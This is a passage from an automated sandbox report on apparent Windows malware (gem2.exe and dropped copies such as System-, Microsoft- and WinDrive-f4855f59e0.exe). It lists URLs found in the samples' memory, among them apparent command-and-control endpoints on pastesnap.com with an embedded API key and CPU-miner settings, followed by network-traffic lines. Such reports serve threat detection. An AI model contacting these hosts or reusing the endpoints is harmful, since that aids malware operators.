Source: System-f4855f59e0.exe, 0000000E.00000002.1334661701.000001DD598A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://burningspice.cfd/Tx
Source: Microsoft-f4855f59e0.exe, 00000011.00000002.1475065410.0000017D99E32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://burningspice.cfd/m
Source: Microsoft-f4855f59e0.exe, 0000003B.00000002.1544601640.0000015F98C78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://burningspice.cfd/pps;PA
Source: powershell.exe, 0000001F.00000002.1554825743.000002006B931000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000001F.00000002.1554825743.000002006B931000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000001F.00000002.1554825743.000002006B931000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: gem2.exe, Microsoft-f4855f59e0.exe.0.dr, WinDrive-f4855f59e0.exe.17.dr, System-f4855f59e0.exe.0.dr, $LMX-f4855f59e0.exe.0.drString found in binary or memory: https://coolcarforum.com/
Source: System-f4855f59e0.exe, 0000000E.00000002.1334661701.000001DD598A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://coolcarforum.com/Ix
Source: Microsoft-f4855f59e0.exe, 00000011.00000002.1475065410.0000017D99E32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://coolcarforum.com/b
Source: gem2.exe, Microsoft-f4855f59e0.exe.0.dr, WinDrive-f4855f59e0.exe.17.dr, System-f4855f59e0.exe.0.dr, $LMX-f4855f59e0.exe.0.drString found in binary or memory: https://creativecoder.top/
Source: Microsoft-f4855f59e0.exe, 0000003B.00000002.1544601640.0000015F98C78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://creativecoder.top/=
Source: System-f4855f59e0.exe, 0000000E.00000002.1334661701.000001DD598A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://creativecoder.top/Lx
Source: Microsoft-f4855f59e0.exe, 00000011.00000002.1475065410.0000017D99E32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://creativecoder.top/s
Source: svchost.exeString found in binary or memory: https://curl.se/
Source: svchost.exe, 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpString found in binary or memory: https://curl.se/V
Source: svchost.exe, svchost.exe, 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpString found in binary or memory: https://curl.se/docs/alt-svc.html
Source: svchost.exeString found in binary or memory: https://curl.se/docs/alt-svc.html#
Source: svchost.exeString found in binary or memory: https://curl.se/docs/copyright.html
Source: svchost.exe, 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpString found in binary or memory: https://curl.se/docs/copyright.htmlD
Source: svchost.exe, svchost.exe, 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpString found in binary or memory: https://curl.se/docs/hsts.html
Source: svchost.exeString found in binary or memory: https://curl.se/docs/hsts.html#
Source: svchost.exe, svchost.exe, 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpString found in binary or memory: https://curl.se/docs/http-cookies.html
Source: svchost.exeString found in binary or memory: https://curl.se/docs/http-cookies.html#
Source: System-f4855f59e0.exe, 0000000E.00000002.1334661701.000001DD5989C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://deepseahunter.col.de/
Source: gem2.exe, Microsoft-f4855f59e0.exe.0.dr, WinDrive-f4855f59e0.exe.17.dr, System-f4855f59e0.exe.0.dr, $LMX-f4855f59e0.exe.0.drString found in binary or memory: https://deepseahunter.com.de/
Source: Microsoft-f4855f59e0.exe, 00000011.00000002.1475065410.0000017D99E1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://deepseahunter.com.de/5
Source: Microsoft-f4855f59e0.exe, 0000003B.00000002.1544601640.0000015F98C78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://deepseahunter.com.de/cal
Source: gem2.exe, Microsoft-f4855f59e0.exe.0.dr, WinDrive-f4855f59e0.exe.17.dr, System-f4855f59e0.exe.0.dr, $LMX-f4855f59e0.exe.0.drString found in binary or memory: https://eonfortnite.com/
Source: Microsoft-f4855f59e0.exe, 0000003B.00000002.1544601640.0000015F98C78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://eonfortnite.com/neDrive
Source: gem2.exe, Microsoft-f4855f59e0.exe.0.dr, WinDrive-f4855f59e0.exe.17.dr, System-f4855f59e0.exe.0.dr, $LMX-f4855f59e0.exe.0.drString found in binary or memory: https://flixmi.top/
Source: Microsoft-f4855f59e0.exe, 00000011.00000002.1475065410.0000017D99E32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://flixmi.top/=C;LC_TIMEQ
Source: Microsoft-f4855f59e0.exe, 0000003B.00000002.1544601640.0000015F98C78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://flixmi.top/=C;LC_TIMEUkk
Source: System-f4855f59e0.exe, 0000000E.00000002.1334661701.000001DD598A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://flixmi.top/xx
Source: gem2.exe, Microsoft-f4855f59e0.exe.0.dr, WinDrive-f4855f59e0.exe.17.dr, System-f4855f59e0.exe.0.dr, $LMX-f4855f59e0.exe.0.drString found in binary or memory: https://galaxyglimmer.top/
Source: Microsoft-f4855f59e0.exe, 00000011.00000002.1475065410.0000017D99E32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://galaxyglimmer.top/F
Source: Microsoft-f4855f59e0.exe, 0000003B.00000002.1544601640.0000015F98C78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://galaxyglimmer.top/Gku
Source: gem2.exe, Microsoft-f4855f59e0.exe.0.dr, WinDrive-f4855f59e0.exe.17.dr, System-f4855f59e0.exe.0.dr, $LMX-f4855f59e0.exe.0.drString found in binary or memory: https://gamergategames.top/
Source: System-f4855f59e0.exe, 0000000E.00000002.1334661701.000001DD598A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gamergategames.top/ux
Source: powershell.exe, 0000001F.00000002.1514433357.000002005BAED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000001F.00000002.1514433357.000002005CA10000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: svchost.exe, 00000010.00000002.2547849226.00000173CD257000.00000002.00000400.00020000.00000000.sdmpString found in binary or memory: https://i.ibb.co/R2mnW0B/ico.png
Source: gem2.exe, Microsoft-f4855f59e0.exe.0.dr, WinDrive-f4855f59e0.exe.17.dr, System-f4855f59e0.exe.0.dr, $LMX-f4855f59e0.exe.0.drString found in binary or memory: https://indexinferno.top/
Source: gem2.exe, Microsoft-f4855f59e0.exe.0.dr, WinDrive-f4855f59e0.exe.17.dr, System-f4855f59e0.exe.0.dr, $LMX-f4855f59e0.exe.0.drString found in binary or memory: https://inforte.top/
Source: gem2.exe, Microsoft-f4855f59e0.exe.0.dr, WinDrive-f4855f59e0.exe.17.dr, System-f4855f59e0.exe.0.dr, $LMX-f4855f59e0.exe.0.drString found in binary or memory: https://jobscontext.top/
Source: System-f4855f59e0.exe, 0000000E.00000002.1334661701.000001DD598A9000.00000004.00000020.00020000.00000000.sdmp, System-f4855f59e0.exe, 0000000E.00000000.1334218488.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmp, System-f4855f59e0.exe, 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmp, Microsoft-f4855f59e0.exe, Microsoft-f4855f59e0.exe, 00000011.00000003.1446815949.0000017D99E3D000.00000004.00000020.00020000.00000000.sdmp, Microsoft-f4855f59e0.exe, 00000011.00000002.1475065410.0000017D99E32000.00000004.00000020.00020000.00000000.sdmp, Microsoft-f4855f59e0.exe, 00000011.00000000.1444761623.00007FF7D1697000.00000002.00000001.01000000.00000008.sdmp, Microsoft-f4855f59e0.exe, 00000011.00000002.1475795269.00007FF7D1697000.00000002.00000001.01000000.00000008.sdmp, WinDrive-f4855f59e0.exe, 00000026.00000000.1472403011.00007FF6F0277000.00000002.00000001.01000000.0000000B.sdmp, WinDrive-f4855f59e0.exe, 00000026.00000002.1525048817.00000226CC15C000.00000004.00000020.00020000.00000000.sdmp, WinDrive-f4855f59e0.exe, 00000026.00000002.1525296362.00007FF6F0277000.00000002.00000001.01000000.0000000B.sdmp, Microsoft-f4855f59e0.exe, 0000003B.00000000.1536925194.00007FF7D1697000.00000002.00000001.01000000.00000008.sdmp, Microsoft-f4855f59e0.exe, 0000003B.00000002.1544601640.0000015F98C78000.00000004.00000020.00020000.00000000.sdmp, Microsoft-f4855f59e0.exe, 0000003B.00000003.1538720334.0000015F98C97000.00000004.00000020.00020000.00000000.sdmp, Microsoft-f4855f59e0.exe, 0000003B.00000002.1544978601.00007FF7D1697000.00000002.00000001.01000000.00000008.sdmp, gem2.exe, Microsoft-f4855f59e0.exe.0.dr, WinDrive-f4855f59e0.exe.17.dr, System-f4855f59e0.exe.0.dr, $LMX-f4855f59e0.exe.0.drString found in binary or memory: https://leadingworld.top/
Source: Microsoft-f4855f59e0.exe, 00000011.00000002.1475065410.0000017D99E32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://leadingworld.top/L
Source: WinDrive-f4855f59e0.exe, 00000026.00000002.1525048817.00000226CC15C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://leadingworld.top/PE=C;LCC
Source: svchost.exe, 00000010.00000002.2547849226.00000173CD257000.00000002.00000400.00020000.00000000.sdmpString found in binary or memory: https://lunarminer.network/
Source: gem2.exe, Microsoft-f4855f59e0.exe.0.dr, WinDrive-f4855f59e0.exe.17.dr, System-f4855f59e0.exe.0.dr, $LMX-f4855f59e0.exe.0.drString found in binary or memory: https://namesell.sbs/
Source: Microsoft-f4855f59e0.exe, 0000003B.00000002.1544601640.0000015F98C78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://namesell.sbs/4PROCESS
Source: System-f4855f59e0.exe, 0000000E.00000002.1334661701.000001DD598A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://namesell.sbs/Ox
Source: Microsoft-f4855f59e0.exe, 00000011.00000002.1475065410.0000017D99E32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://namesell.sbs/t
Source: powershell.exe, 0000001F.00000002.1554825743.000002006B931000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: cmd.exe, 0000002A.00000002.1478464304.000001A9808AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastesnap.c
Source: gem2.exe, Microsoft-f4855f59e0.exe.0.dr, WinDrive-f4855f59e0.exe.17.dr, System-f4855f59e0.exe.0.dr, $LMX-f4855f59e0.exe.0.drString found in binary or memory: https://pastesnap.com/
Source: powercfg.exe, 00000012.00000002.1449981083.0000029437030000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastesnap.com/(W
Source: svchost.exe, 00000010.00000002.2553827080.00000173CE013000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastesnap.com/0
Source: WMIC.exe, 00000037.00000002.1519599624.000001C183517000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000037.00000003.1519154244.000001C183517000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000037.00000003.1516325556.000001C183512000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastesnap.com/0xY
Source: cmd.exe, 00000030.00000002.1484571689.000001A649E50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastesnap.com/3
Source: svchost.exe, 00000010.00000002.2554341140.00000173CE0C1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000002.2553943667.00000173CE027000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastesnap.com/API/cGFzdGVzbmFwEP.php
Source: svchost.exe, 00000010.00000002.2553943667.00000173CE027000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastesnap.com/API/cGFzdGVzbmFwEP.phpPKU2U
Source: svchost.exe, 00000010.00000002.2555613530.00000173CFB6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastesnap.com/API/cGFzdGVzbmFwEP.phpYg==M.txt
Source: svchost.exe, 00000010.00000002.2554482364.00000173CE0D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastesnap.com/API/cGFzdGVzbmFwEP.phpYg==M.txtsage.cfdapi_key=ut1bkd3rwa55zy8mt1hc&id=21&sett
Source: svchost.exe, 00000010.00000002.2554569786.00000173CE0EA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000002.2555613530.00000173CFB6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastesnap.com/API/cGFzdGVzbmFwEP.phpapi_key=ut1bkd3rwa55zy8mt1hc&id=21&settings_type=cpu
Source: svchost.exe, 00000010.00000002.2554569786.00000173CE0EA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000002.2555613530.00000173CFB6E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000002.2554482364.00000173CE0D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastesnap.com/API/cGFzdGVzbmFwEP.phpc78da9f679b97f91d60
Source: svchost.exe, 00000010.00000002.2553943667.00000173CE027000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastesnap.com/API/cGFzdGVzbmFwEP.phpc78da9f679b97f91d60Schannel
Source: svchost.exe, 00000010.00000002.2554569786.00000173CE0EA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000002.2555613530.00000173CFB6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastesnap.com/API/cGFzdGVzbmFwEP.phpc78da9f679b97f91d60api_key=ut1bkd3rwa55zy8mt1hc&id=21&se
Source: svchost.exe, 00000010.00000002.2554482364.00000173CE0D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastesnap.com/API/cGFzdGVzbmFwEP.phpc78da9f679b97f91d60https://pastesnap.com/API/cGFzdGVzbmF
Source: svchost.exe, 00000010.00000002.2554569786.00000173CE0EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastesnap.com/API/cGFzdGVzbmFwEP.phpe2d6cbd0e29b34bc6adbd3513173b3b0
Source: svchost.exe, 00000010.00000002.2555586195.00000173CFB69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastesnap.com/API/cGFzdGVzbmFwEP.phphttps://pastesnap.com/API/cGFzdGVzbmFwEP.php
Source: svchost.exe, 00000010.00000002.2553943667.00000173CE027000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastesnap.com/API/cGFzdGVzbmFwEP.phphttps://pastesnap.com/API/cGFzdGVzbmFwEP.phpc78da9f679b9
Source: svchost.exe, 00000010.00000002.2553943667.00000173CE027000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastesnap.com/API/cGFzdGVzbmFwEP.phpur32.dllP
Source: svchost.exe, 00000010.00000002.2554341140.00000173CE0BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastesnap.com/API/cGFzdGVzbmFwGUS.php?ap
Source: svchost.exe, 00000010.00000002.2554341140.00000173CE0BF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000002.2553736925.00000173CE000000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastesnap.com/API/cGFzdGVzbmFwGUS.php?api_key=ut1bkd3rwa55zy8mt1hc&id=21&settings_type=cpu
Source: svchost.exe, 00000010.00000002.2554097147.00000173CE06D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000002.2554341140.00000173CE0BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastesnap.com/API/cGFzdGVzbmFwGUS.php?api_key=ut1bkd3rwa55zy8mt1hc&id=21&settings_type=cpu4c
Source: svchost.exe, 00000010.00000002.2554097147.00000173CE06D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000002.2555349401.00000173CFB44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastesnap.com/API/cGFzdGVzbmFwGUS.php?api_key=ut1bkd3rwa55zy8mt1hc&id=21&settings_type=cpuPh
Source: svchost.exe, 00000010.00000002.2555349401.00000173CFB44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastesnap.com/API/cGFzdGVzbmFwGUS.php?api_key=ut1bkd3rwa55zy8mt1hc&id=21&settings_type=cpuU
Source: svchost.exe, 00000010.00000002.2553736925.00000173CE000000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastesnap.com/API/cGFzdGVzbmFwGUS.php?api_key=ut1bkd3rwa55zy8mt1hc&id=21&settings_type=cpueb
Source: svchost.exe, 00000010.00000002.2554341140.00000173CE0BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastesnap.com/API/cGFzdGVzbmFwGUS.php?api_key=ut1bkd3rwa55zy8mt1hc&id=21&settings_type=cpuht
Source: svchost.exe, 00000010.00000002.2553736925.00000173CE000000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastesnap.com/API/cGFzdGVzbmFwGUS.php?api_key=ut1bkd3rwa55zy8mt1hc&id=21&settings_type=cpuin
Source: icacls.exe, 00000032.00000002.1483865441.00000234E1B14000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000033.00000003.1495332041.000002AAC5386000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000033.00000003.1504484027.000002AAC5386000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000033.00000002.1505179200.000002AAC5554000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000033.00000003.1504484027.000002AAC538A000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000033.00000003.1495332041.000002AAC538A000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000033.00000002.1504902044.000002AAC5330000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000033.00000003.1504652619.000002AAC538A000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000033.00000002.1505179200.000002AAC5550000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000033.00000002.1505078012.000002AAC538A000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000033.00000003.1504652619.000002AAC5386000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000037.00000003.1515891023.000001C183590000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000037.00000002.1520024404.000001C1836E4000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000037.00000002.1520024404.000001C1836E0000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000037.00000003.1519193668.000001C183553000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000037.00000002.1519977745.000001C183590000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000037.00000002.1519872411.000001C183554000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000037.00000003.1518859883.000001C183551000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000037.00000003.1516325556.000001C183551000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000037.00000002.1519599624.000001C183500000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000003C.00000002.1548361165.0000023245FA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastesnap.com/APPDATA=C:
Source: System-f4855f59e0.exe, 0000000E.00000002.1334661701.000001DD5989C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastesnap.com/Kh
Source: gem2.exe, 00000000.00000003.1329691499.000002351CBED000.00000004.00000020.00020000.00000000.sdmp, gem2.exe, 00000000.00000003.1420573984.000002351CBC8000.00000004.00000020.00020000.00000000.sdmp, gem2.exe, 00000000.00000003.1329805123.000002351CBEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastesnap.com/STB/cGFzdGVzbmFwM.txt
Source: gem2.exe, 00000000.00000003.1420573984.000002351CBC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastesnap.com/STB/cGFzdGVzbmFwM.txt/
Source: gem2.exe, 00000000.00000003.1420573984.000002351CBC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastesnap.com/STB/cGFzdGVzbmFwM.txt5
Source: gem2.exe, 00000000.00000003.1420573984.000002351CBC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastesnap.com/STB/cGFzdGVzbmFwM.txtup
Source: Microsoft-f4855f59e0.exe, 0000003B.00000002.1544601640.0000015F98C78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastesnap.com/Windows
Source: svchost.exe, 00000010.00000002.2553943667.00000173CE027000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastesnap.com/blockremoteimageloadsdevicecapabilitycamera
Source: gem2.exe, Microsoft-f4855f59e0.exe.0.dr, WinDrive-f4855f59e0.exe.17.dr, System-f4855f59e0.exe.0.dr, $LMX-f4855f59e0.exe.0.drString found in binary or memory: https://pastesnap.com/https://deepseahunter.com.de/https://projectretrac.com/https://brettdogecoin.c
Source: cmd.exe, 0000002A.00000002.1478464304.000001A9808A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastesnap.com/t
Source: gem2.exe, Microsoft-f4855f59e0.exe.0.dr, WinDrive-f4855f59e0.exe.17.dr, System-f4855f59e0.exe.0.dr, $LMX-f4855f59e0.exe.0.drString found in binary or memory: https://projectretrac.com/
Source: System-f4855f59e0.exe, 0000000E.00000002.1334661701.000001DD5989C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://projectretrac.com/Hh
Source: Microsoft-f4855f59e0.exe, 0000003B.00000002.1544601640.0000015F98C78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://projectretrac.com/P_PROF
Source: gem2.exe, Microsoft-f4855f59e0.exe.0.dr, WinDrive-f4855f59e0.exe.17.dr, System-f4855f59e0.exe.0.dr, $LMX-f4855f59e0.exe.0.drString found in binary or memory: https://russianculturalheritage.ru/
Source: Microsoft-f4855f59e0.exe, 00000011.00000002.1475065410.0000017D99E1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://russianculturalheritage.ru/o
Source: svchost.exe, 00000010.00000002.2553827080.00000173CE013000.00000004.00000020.00020000.00000000.sdmp, Microsoft-f4855f59e0.exe, Microsoft-f4855f59e0.exe, 00000011.00000003.1446815949.0000017D99E3D000.00000004.00000020.00020000.00000000.sdmp, Microsoft-f4855f59e0.exe, 00000011.00000002.1475065410.0000017D99E32000.00000004.00000020.00020000.00000000.sdmp, Microsoft-f4855f59e0.exe, 00000011.00000000.1444761623.00007FF7D1697000.00000002.00000001.01000000.00000008.sdmp, Microsoft-f4855f59e0.exe, 00000011.00000002.1475795269.00007FF7D1697000.00000002.00000001.01000000.00000008.sdmp, WinDrive-f4855f59e0.exe, 00000026.00000000.1472403011.00007FF6F0277000.00000002.00000001.01000000.0000000B.sdmp, WinDrive-f4855f59e0.exe, 00000026.00000002.1525048817.00000226CC15C000.00000004.00000020.00020000.00000000.sdmp, WinDrive-f4855f59e0.exe, 00000026.00000002.1525296362.00007FF6F0277000.00000002.00000001.01000000.0000000B.sdmp, Microsoft-f4855f59e0.exe, 0000003B.00000000.1536925194.00007FF7D1697000.00000002.00000001.01000000.00000008.sdmp, Microsoft-f4855f59e0.exe, 0000003B.00000002.1544601640.0000015F98C78000.00000004.00000020.00020000.00000000.sdmp, Microsoft-f4855f59e0.exe, 0000003B.00000003.1538720334.0000015F98C97000.00000004.00000020.00020000.00000000.sdmp, Microsoft-f4855f59e0.exe, 0000003B.00000002.1544978601.00007FF7D1697000.00000002.00000001.01000000.00000008.sdmp, gem2.exe, Microsoft-f4855f59e0.exe.0.dr, WinDrive-f4855f59e0.exe.17.dr, System-f4855f59e0.exe.0.dr, $LMX-f4855f59e0.exe.0.drString found in binary or memory: https://securetextweb.cc/
Source: Microsoft-f4855f59e0.exe, 0000003B.00000002.1544601640.0000015F98C78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://securetextweb.cc/BAT;.CM
Source: svchost.exe, 00000010.00000002.2555613530.00000173CFB71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://securetextweb.cc/STB/c2VjdXJldGV4dHdlYg==M.txt
Source: Microsoft-f4855f59e0.exe, 00000011.00000002.1475065410.0000017D99E32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://securetextweb.cc/y
Source: gem2.exe, Microsoft-f4855f59e0.exe.0.dr, WinDrive-f4855f59e0.exe.17.dr, System-f4855f59e0.exe.0.dr, $LMX-f4855f59e0.exe.0.drString found in binary or memory: https://spokoystvieidusha.ru/
Source: Microsoft-f4855f59e0.exe, 0000003B.00000002.1544601640.0000015F98C78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://spokoystvieidusha.ru/E;.WS
Source: WinDrive-f4855f59e0.exe, 00000026.00000002.1525048817.00000226CC15C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://spokoystvieidusha.ru/_TIMEQ
Source: gem2.exe, Microsoft-f4855f59e0.exe.0.dr, WinDrive-f4855f59e0.exe.17.dr, System-f4855f59e0.exe.0.dr, $LMX-f4855f59e0.exe.0.drString found in binary or memory: https://syncaicloud.com/
Source: Microsoft-f4855f59e0.exe, 0000003B.00000002.1544601640.0000015F98C78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://syncaicloud.com/ndows
Source: svchost.exe, 00000010.00000002.2547849226.00000173CD257000.00000002.00000400.00020000.00000000.sdmp, svchost.exe, 00000010.00000002.2553827080.00000173CE013000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://textbinvault.com/
Source: svchost.exe, 00000010.00000002.2553827080.00000173CE013000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://textbinvault.com/STB/dGV4dGJpbnZhdWx0M.txt
Source: gem2.exe, Microsoft-f4855f59e0.exe.0.dr, WinDrive-f4855f59e0.exe.17.dr, System-f4855f59e0.exe.0.dr, $LMX-f4855f59e0.exe.0.drString found in binary or memory: https://tiffanyonlinestore.top/
Source: Microsoft-f4855f59e0.exe, 0000003B.00000002.1544601640.0000015F98C78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffanyonlinestore.top/Ak
Source: WinDrive-f4855f59e0.exe, 00000026.00000002.1525048817.00000226CC15C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffanyonlinestore.top/H
Source: Microsoft-f4855f59e0.exe, 00000011.00000002.1475065410.0000017D99E32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffanyonlinestore.top/a
Source: gem2.exe, Microsoft-f4855f59e0.exe.0.dr, WinDrive-f4855f59e0.exe.17.dr, System-f4855f59e0.exe.0.dr, $LMX-f4855f59e0.exe.0.drString found in binary or memory: https://wavepassage.cfd/
Source: Microsoft-f4855f59e0.exe, 0000003B.00000002.1544601640.0000015F98C78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wavepassage.cfd/Bkz
Source: svchost.exe, 00000010.00000002.2555613530.00000173CFB71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wavepassage.cfd/STB/d2F2ZXBhc3NhZ2U=M.txt
Source: svchost.exe, 00000010.00000002.2553827080.00000173CE013000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wavepassage.cfd/https://pastesnap.com/https://textbinvault.com/NegoExtender
Source: svchost.exe, 00000010.00000002.2547849226.00000173CD257000.00000002.00000400.00020000.00000000.sdmpString found in binary or memory: https://wavepassage.cfd/https://pastesnap.com/https://textbinvault.com/https://securetextweb.cc/80
Source: gem2.exe, Microsoft-f4855f59e0.exe.0.dr, WinDrive-f4855f59e0.exe.17.dr, System-f4855f59e0.exe.0.dr, $LMX-f4855f59e0.exe.0.drString found in binary or memory: https://wildlify.com/
Source: Microsoft-f4855f59e0.exe, 0000003B.00000002.1544601640.0000015F98C78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wildlify.com/Java
Source: svchost.exeString found in binary or memory: https://www.openssl.org/
Source: svchost.exe, 00000010.00000002.2558519464.00000173D0113000.00000002.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.openssl.org/H
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49985
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50614
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50615
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50617
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50610
Source: unknownNetwork traffic detected: HTTP traffic on port 50395 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50234 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50257 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50452 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
